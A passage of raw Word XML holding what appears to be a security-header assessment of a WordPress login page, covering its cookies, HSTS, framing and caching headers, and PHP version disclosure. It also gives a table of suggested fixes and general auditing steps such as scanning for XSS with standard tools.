      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> redirect to HTTPS automatically, as Secure cookies require HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A0605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53255" cy="4292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010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2" w:rsidRDefault="00A06052" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A06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1. HTTP Status:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A060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Status: 200 OK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>This indicates the request was successful, and the server returned the requested resource (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wp-login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A06052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A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A06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2. Cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A060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 xml:space="preserve">set-cookie: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wordpress_test_cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=WP%20Cookie%20check; path=/; secure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A060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06052">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A cookie (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wordpress_test_cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A06052">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) was set for testing purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A060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0605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9A74F9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>secure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t xml:space="preserve"> flag means the cookie will only be sent over HTTPS, ensuring it is not exposed over insecure connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A06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3. Content Security:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A060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Strict Transport Security (HSTS):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A060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 xml:space="preserve">strict-transport-security: max-age=63072000; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>includeSubDomains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>This ensures that browsers only connect to the website over HTTPS for the next two years (63072000 seconds) and includes all subdomains in this policy.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br/>
      </w:r>
      <w:r w:rsidRPr="00A06052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74F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Good for HTTPS enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A060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X-Frame-Options:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A060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lastRenderedPageBreak/>
        <w:t>x-frame-options: SAMEORIGIN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 xml:space="preserve">Prevents the site from being embedded in an iframe on a different domain, protecting against </w:t>
      </w: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clickjacking attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A060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X-Content-Type-Options:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="007A7C47" w:rsidRDefault="00A06052" w:rsidP="00A060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 xml:space="preserve">x-content-type-options: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nosniff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>Prevents browsers from interpreting files as a different MIME</w:t>
      </w:r>
      <w:r w:rsidR="00E14180">
        <w:t>(Multipurpose Internet Mail Extensions)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t xml:space="preserve"> type to mitigate attacks like </w:t>
      </w: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MIME sniffing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A7C47" w:rsidRPr="00050164" w:rsidRDefault="007A7C47" w:rsidP="00A0605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Stops browsers from guessing the type of a file (like treating text as an image) to prevent misuse or attacks that trick browsers into running harmful content.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00050164" w:rsidRPr="00A06052" w:rsidRDefault="00050164" w:rsidP="000501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124552" cy="1388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4FC5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96" cy="13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52" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A06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4. Cache Control:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A060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Cache Policy:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A3B54" w:rsidRPr="003A3B54" w:rsidRDefault="00A06052" w:rsidP="003A3B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>cache-control: no-cache, must-revalidate, max-age=0</w:t>
      </w:r>
      <w:r w:rsidR="003A3B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003A3B54" w:rsidRPr="003A3B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">browser </w:t>
      </w:r>
      <w:r w:rsidR="003A3B54" w:rsidRPr="003A3B54">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>not to store</w:t>
      </w:r>
      <w:r w:rsidR="003A3B54" w:rsidRPr="003A3B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the page in cache, and always fetch the latest version from the server when it is requested.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="003A3B54" w:rsidP="003A3B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</w:t>
      </w:r>
      <w:r w:rsidR="00A06052"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pires Header:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="003A3B5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>expires: Wed, 11 Jan 1984 05:00:00 GMT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>This date ensures the content is treated as expired by default.</w:t>
      </w:r>
      <w:r w:rsidR="003A3B54" w:rsidRPr="003A3B54">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A3B54">
        <w:t>meaning the browser will consider it outdated and will never use it from the cache, forcing it to request a fresh version from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A06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5. Server Details:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A060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Server Type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A060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 xml:space="preserve">Server: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve">The website is behind </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A06052">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cloudflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A06052">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, a content delivery network (CDN) that helps improve security and performance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A060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X-Powered-By:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A0605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>x-powered-by: PHP/7.4.33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br/>
        <w:t>Indicates the website runs on PHP version 7.4.33.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br/>
      </w:r>
      <w:r w:rsidRPr="00A06052">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00A060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74F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This can be a security risk as attackers know the underlying technology.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A060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CF-Cache-Status:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33515" w:rsidRPr="00B33515" w:rsidRDefault="00A06052" w:rsidP="00B335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74F9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CF-Cache-Status: DYNAMIC</w:t>
      </w:r>
      <w:r w:rsidR="00B33515">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B33515">
        <w:t xml:space="preserve">the content on the website is </w:t>
      </w:r>
      <w:r w:rsidR="00B33515">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>generated in real-time</w:t>
      </w:r>
      <w:r w:rsidR="00B33515">
        <w:t xml:space="preserve"> (not stored or cached) by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B33515">
        <w:t>Cloudflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B33515">
        <w:t>, meaning it updates with each request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRDefault="00A06052" w:rsidP="00B33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F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6. Additional Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33515" w:rsidRPr="00B33515" w:rsidRDefault="00B33515" w:rsidP="00B33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1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335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33515">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alt-Svc</w:t>
      </w:r>
      <w:r w:rsidRPr="00B33515">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">This shows that the server supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00B33515">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTTP/3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B33515">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which helps load the website </w:t>
      </w:r>
      <w:r w:rsidRPr="00B33515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B33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515" w:rsidRPr="00B33515" w:rsidRDefault="00B33515" w:rsidP="00B33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15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r w:rsidRPr="00B335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33515">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Server Timing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B33515">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">This gives information about how long it takes for data to travel between the server and your browser (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00B33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round-trip time = 3670 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B33515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 w:rsidRPr="00B33515">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> means it took 3.67 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33515" w:rsidRPr="00B33515" w:rsidRDefault="00B33515" w:rsidP="00B335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A74F9" w:rsidRPr="009A74F9" w:rsidRDefault="009A74F9" w:rsidP="00050164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9A74F9" w:rsidRPr="009A74F9" w:rsidRDefault="0040144C" w:rsidP="009A74F9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9A74F9" w:rsidRPr="009A74F9" w:rsidRDefault="009A74F9" w:rsidP="009A74F9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Summary of Vulnerabilities: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874"/>
        <w:gridCol w:w="5432"/>
      </w:tblGrid>
      <w:tr w:rsidR="009A74F9" w:rsidRPr="009A74F9" w:rsidTr="009A74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jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A74F9">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20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jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A74F9">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20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jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A74F9">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A74F9" w:rsidRPr="009A74F9" w:rsidTr="009A74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PHP version disclosure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 xml:space="preserve">Disable </w:t>
            </w:r>
            <w:r w:rsidRPr="009A74F9">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>X-Powered-By</w:t>
            </w:r>
            <w:r w:rsidRPr="009A74F9">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> header.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A74F9" w:rsidRPr="009A74F9" w:rsidTr="009A74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 xml:space="preserve">Missing </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A74F9">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>HttpOnly</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A74F9">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> on cookies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 xml:space="preserve">Add </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A74F9">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>HttpOnly</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A74F9">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A74F9">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>SameSite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A74F9">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> flags to all cookies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A74F9" w:rsidRPr="009A74F9" w:rsidTr="009A74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Potential session hijacking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Secure session cookies and validate user input to avoid XSS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A74F9" w:rsidRPr="009A74F9" w:rsidTr="009A74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XSS risks (no CSP)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Add a Content Security Policy (CSP) header.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A74F9" w:rsidRPr="009A74F9" w:rsidTr="009A74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Incomplete caching control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Disable caching for sensitive pages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A74F9" w:rsidRPr="009A74F9" w:rsidTr="009A74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TLS misconfiguration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9A74F9" w:rsidRPr="009A74F9" w:rsidRDefault="009A74F9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A74F9">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ensure secure protocols and ciphers are in use; test with SSL Labs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRDefault="00A06052" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRDefault="00A06052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050164" w:rsidRDefault="00050164" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00050164" w:rsidRDefault="00050164" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00050164" w:rsidRDefault="00050164" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00050164" w:rsidRDefault="00050164" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00050164" w:rsidRDefault="00050164" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00050164" w:rsidRDefault="00050164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9A74F9" w:rsidRDefault="009A74F9" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="009A74F9" w:rsidRDefault="00A06052" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Step 2: Verify HSTS Configuration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 xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SecurityHeaders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> to check if the site uses HTTP Strict Transport Security (HSTS).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lastRenderedPageBreak/>
        <w:t>HSTS forces browsers to use HTTPS for all requests, reducing the risk of downgrade attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="009A74F9" w:rsidRDefault="00A06052" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Step 3: Inspect Cookies in Developer Tools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>Open Developer Tools (F12) and navigate to the Application or Storage tab.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 xml:space="preserve">Check if all sensitive cookies (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>wpdm_client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">) have both the Secure and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> flags.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>Confirm the absence of unnecessary cookies or cookies lacking proper security attributes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="009A74F9" w:rsidRDefault="00A06052" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Step 4: Test for Vulnerabilities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 xml:space="preserve">Cross-Site Scripting (XSS): Simulate or scan for XSS vulnerabilities using tools like OWASP ZAP or Burp Suite. Verify if cookies are accessible via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.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>Downgrade Attacks: Attempt to access the site via HTTP and observe if any cookies are transmitted over plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06052" w:rsidRPr="009A74F9" w:rsidRDefault="00A06052" w:rsidP="00A06052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Step 5: Analyze Session Management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>Confirm that session cookies (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A74F9">
        <w:rPr>
